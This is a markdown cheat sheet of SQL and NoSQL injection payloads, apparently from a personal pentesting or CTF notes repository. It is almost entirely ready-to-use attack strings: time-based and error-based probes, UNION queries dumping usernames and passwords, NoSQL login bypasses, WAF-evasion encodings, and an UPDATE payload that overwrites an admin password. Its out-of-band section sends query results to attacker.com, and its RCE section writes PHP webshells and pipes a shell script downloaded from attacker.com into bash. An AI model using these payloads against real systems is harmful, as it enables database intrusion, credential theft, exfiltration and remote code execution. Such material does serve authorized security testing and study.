Skip to content

SQL-Injection.md

Latest commit

 

History

History
266 lines (196 loc) · 7.81 KB

SQL-Injection.md

File metadata and controls

266 lines (196 loc) · 7.81 KB

SQL Injection

  • Bypass Techniques

    White Space > SELECT/**/1
Hex > select concat(0x31333337,0x206840783072)
CHR and String Concatenation > #SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);
Hex > 0x61646D696E ( admin )

Ex:
	select convert_from(decode('QVdBRQ==', 'base64'), 'utf-8');

Limit = Just limit lol

  • First things to test

    dbms_pipe.receive_message(('a'),10)--
WAITFOR DELAY '0:0:10'#
;SELECT pg_sleep(10)--
6377 
`';%20waitfor%20delay%20'0:0:6'%20--%20`
`' OR 1=1 --[SPACE]`
NoSQL: foo'||1||'
			
Append Examples >t
	%'asd
	cookie'||pg_sleep(10)--
	14 and if(1=1, sleep(15), false)--
	admin');SELECT PG_SLEEP(5)--

'XOR(SELECT(0)FROM(SELECT(SLEEP(20)))a)XOR'Z

  • MARIADB

    ' OR 1=1 --[SPACE]
admin' and extractvalue(0x0a,concat(0x0a,(select group_concat(table_name) from information_schema.tables where table_schema=database())));-- -
admin' and extractvalue(0x0a,concat(0x0a,(select concat(username, ':', password) from users)));--
admin' and extractvalue(0x0a,concat(0x0a,(select version())));--

  • Oracle

    **String concatenation >** 'foo'||'bar'
**Substring >** SUBSTR('foobar', 4, 2)
**Comment > --
Database version >** SELECT banner FROM v$version
									 ****SELECT version FROM v$instance
**DB Contents >** SELECT * FROM all_tables  
						  SELECT * FROM all_tab_columns WHERE table_name='table'

**Time Delay >** dbms_pipe.receive_message(('a'),10)

  • Microsoft And MYSQL

    **String concatenation** > 'foo'+'bar'
**Substring** > SUBSTRING('foobar', 4, 2)
**Comment** > --, #(MYSQL)
**Database version** > SELECT @@version
**DB Contents** > 
				SELECT * FROM information_schema.tables
				SELECT * FROM information_schema.columns WHERE table_name='table'

**Time Delay** > WAITFOR DELAY '0:0:10'

  • PostgreSQL

    **String concatenation** > 'foo' || 'bar'
**Substring** > SUBSTRING('foobar' FROM 4 FOR 2)
**Comment** > --
**Database version** > SELECT version()
**DB Contents** >
            SELECT * FROM information_schema.tables
            SELECT * FROM information_schema.columns WHERE table_name='table'

**Time** **Delay** > SELECT pg_sleep(10);

  • NoSQL

    # Authentication bypass
{"username":{"$ne":""},"password":{"$ne":""}}
{"username":"admin","password":{"$gt":""}}
{"username":{"$regex":"admin.*"},"password":{"$ne":""}}
{"username":{"$in":["admin","administrator"]},"password":{"$ne":""}}

# Operator injection
{"username":"admin","password":{"$regex":"^a"}}   # extract password char by char
{"username":"admin","password":{"$regex":"^a.*"}}

# URL parameter injection (Express/Mongoose)
username=admin&password[$ne]=x
username[$regex]=admin.*&password[$ne]=x
username=admin&password[$gt]=
username[$nin][]=admin&password[$ne]=x

# NoSQL injection in JSON
{"$where": "this.username == 'admin' && this.password.match(/^a.*/)"}
{"$where": "sleep(5000)"}
{"username": {"$gt": ""}, "password": {"$gt": ""}}

# MongoDB-specific
' || 1==1//
' || 1==1%00
admin' || '' == '
{"$gt": ""}

  • Blind SQL Injection Payloads

    DB Wasn't oracle ( Using SUBSTRING)
Conditional response 
**Injected Cookie >** =xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'administrator'), 16, 1)='a

Db was oracle
Conditional error
Injected Cookie > =xyz'||(SELECT CASE WHEN SUBSTR(password,17,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'

  • Union Payloads

    'ORDER BY 2--
'UNION SELECT null,null--
'UNION SELECT null, username||'~'||password FROM users--
'UNION SELECT banner,null from v$version--
'UNION SELECT '@@version',null#
'UNION SELECT null, column_name from information_schema.tables where table_name = users_bvqamp--

  • Examples

    	Error based = select/**/(substring((select/**/version()),1,1))='5';
	https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/
	
	admin' and extractvalue(0x0a,concat(0x0a,(select substring(password, 11, 10) from users limit 1)));-- -

admin' and extractvalue(0x0a,concat(0x0a,(select substring(password, 21, 10) from users limit 1)));-- -

  • SQLMAP

     sqlmap -r req.txt -p "item" --dbms sqlite -D SQLite_masterdb -T flags18999e4de24f117351f28f01382746e3 --dump

  • Update

    ', password='008c70392e3abfbd0fa47bbc2ed96aa99bd49e159727fcba0f2e6abeb3a9d601' WHERE name='Admin'-- -

sqlite:
	',nickName=(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),email='
	',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='secrets'),email='
	',nickName=(SELECT group_concat(id || "," || author || "," || secret || ":") from secrets),email='
	' UNION SELECT 1,group_concat(password) FROM users-- -
// group_concat ( dump all columns )

  • WAF Bypass Advanced

    # Comment-based
/*!50000UNION*//*!50000SELECT*/1,2,3
UN/**/ION SE/**/LECT 1,2,3
/*!UNION*/ /*!SELECT*/ 1,2,3

# Case manipulation
uNiOn SeLeCt 1,2,3
UnIoN/**/sElEcT 1,2,3

# Encoding
UNION%0aSELECT 1,2,3             # newline
UNION%0dSELECT 1,2,3             # carriage return
UNION%09SELECT 1,2,3             # tab
UNION%a0SELECT 1,2,3             # non-breaking space
UNI%4fN SELECT 1,2,3             # hex encode O

# String concatenation (bypass keyword detection)
CONCAT(0x73656C656374)           # 'select' in hex
CHAR(115,101,108,101,99,116)     # 'select' via CHAR

# No spaces
(SELECT(1))
UNION(SELECT(1),(2),(3))
'OR'1'='1
'AND(1)=(1)--

# Scientific notation bypass
0e1union(select(1),2,3)

# HPP (split across params)
?id=1&id=' UNION SELECT 1,2,3--

  • Second Order SQLi

    # Payload stored in DB, executed later in different query
# Register username: admin'--
# When app uses stored username in query without sanitization
# e.g., SELECT * FROM users WHERE username='admin'--'

# Register with: ' UNION SELECT password FROM users WHERE username='admin'--
# View profile later -> triggers the injection

  • Out-of-Band (OOB) Exfiltration

    # MySQL
SELECT LOAD_FILE(CONCAT('\\\\',version(),'.attacker.com\\a'))
SELECT * INTO OUTFILE '\\\\attacker.com\\share\\output.txt'

# MSSQL
EXEC master..xp_dirtree '\\attacker.com\share'
; EXEC xp_fileexist '\\attacker.oastify.com\a'

# PostgreSQL
COPY (SELECT version()) TO PROGRAM 'curl attacker.com'
CREATE TABLE test(data text); COPY test FROM PROGRAM 'id';

# Oracle
SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT user FROM dual)) FROM dual
SELECT DBMS_LDAP.INIT(('attacker.com',80) FROM dual

  • RCE via SQLi

    # MySQL - INTO OUTFILE (write webshell)
' UNION SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php'--

# MSSQL - xp_cmdshell
'; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;--
'; EXEC xp_cmdshell 'whoami';--

# PostgreSQL - COPY TO PROGRAM
'; COPY (SELECT '') TO PROGRAM 'curl attacker.com/shell.sh|bash';--
'; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id';--

# SQLite - attach database + write webshell
'; ATTACH DATABASE '/var/www/html/shell.php' AS pwn; CREATE TABLE pwn.shell(payload text); INSERT INTO pwn.shell VALUES('<?php system($_GET["cmd"]);?>');--